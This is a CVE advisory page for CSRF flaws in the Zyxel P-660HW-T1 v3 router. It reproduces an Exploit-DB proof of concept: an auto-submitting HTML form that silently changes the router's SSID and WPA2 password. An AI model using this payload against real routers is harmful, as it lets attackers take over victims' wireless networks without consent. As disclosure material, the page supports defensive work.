CVE-2014-4162
Description
Multiple cross-site request forgery (CSRF) vulnerabilities in the Zyxel P-660HW-T1 (v3) wireless router allow remote attackers to hijack the authentication of administrators for requests that change the (1) wifi password or (2) SSID via a request to Forms/WLAN_General_1.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
ZYXEL P-660HW-T1 3 Wireless Router - Cross-Site Request Forgery
# Exploit Title: Zyxel P-660HW-T1 v3 Wireless Router - CSRF Vulnerabilities
# Date: 05/22/2014
# Author: Mustafa ALTINKAYNAK
# Vendor Homepage:http://www.zyxel.com/tr/tr/products_services/p_660hw_series.shtml?t=p
# Category: Hardware/Wireless Router
# Tested on: Zyxel P-660HW-T1 v3 Wireless Router
# Patch/ Fix: Vendor has not provided any fix for this yet
---------------------------
Technical Details
---------------------------
This vulnerability was tested at the P-660HW-T1 devices. Admin panel is open you can run remote code destination.
You can send the form below to prepare the target. Please offending. Being partners in crime.
Disclosure Timeline
---------------------------
05/21/2014 Contacted Vendor
05/22/2014 Vendor Replied
04/22/2014 Vulnerability Explained (No reply received)
05/23/2014 Full Disclosure
Exploit Code
---------------------------
Change Wifi (WPA2/PSK) password & SSID by CSRF
---------------------------------------------------------------------------------
<html>
<body onload="document.form.submit();">
<form action="http://192.168.1.1/Forms/WLAN_General_1"
method="POST" name="form">
<input type="hidden" name="EnableWLAN" value="on">
<input type="hidden" name="Channel_ID" value="00000005">
<input type="hidden" name="ESSID" value="WIFI NAME">
<input type="hidden" name="Security_Sel" value="00000002">
<input type="hidden" name="SecurityFlag" value="0">
<input type="hidden" name="WLANCfgPSK" value="123456">
<input type="hidden" name="WLANCfgWPATimer" value="1800">
<input type="hidden" name="QoS_Sel" value="00000000">
<input type="hidden" name="sysSubmit" value="Uygula">
</form>
</body>
</html>
-----------
Mustafa ALTINKAYNAK
twitter : @m_altinkaynak <https://twitter.com/m_altinkaynak>
www.mustafaaltinkaynak.comReferences
- http://osvdb.org/show/osvdb/107449
- http://packetstormsecurity.com/files/126812/Zyxel-P-660HW-T1-Cross-Site-Request-Forgery.html
- http://secunia.com/advisories/58513
- http://www.exploit-db.com/exploits/33518
- http://osvdb.org/show/osvdb/107449
- http://packetstormsecurity.com/files/126812/Zyxel-P-660HW-T1-Cross-Site-Request-Forgery.html
- http://secunia.com/advisories/58513
- http://www.exploit-db.com/exploits/33518
CWEs
CWE-352
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.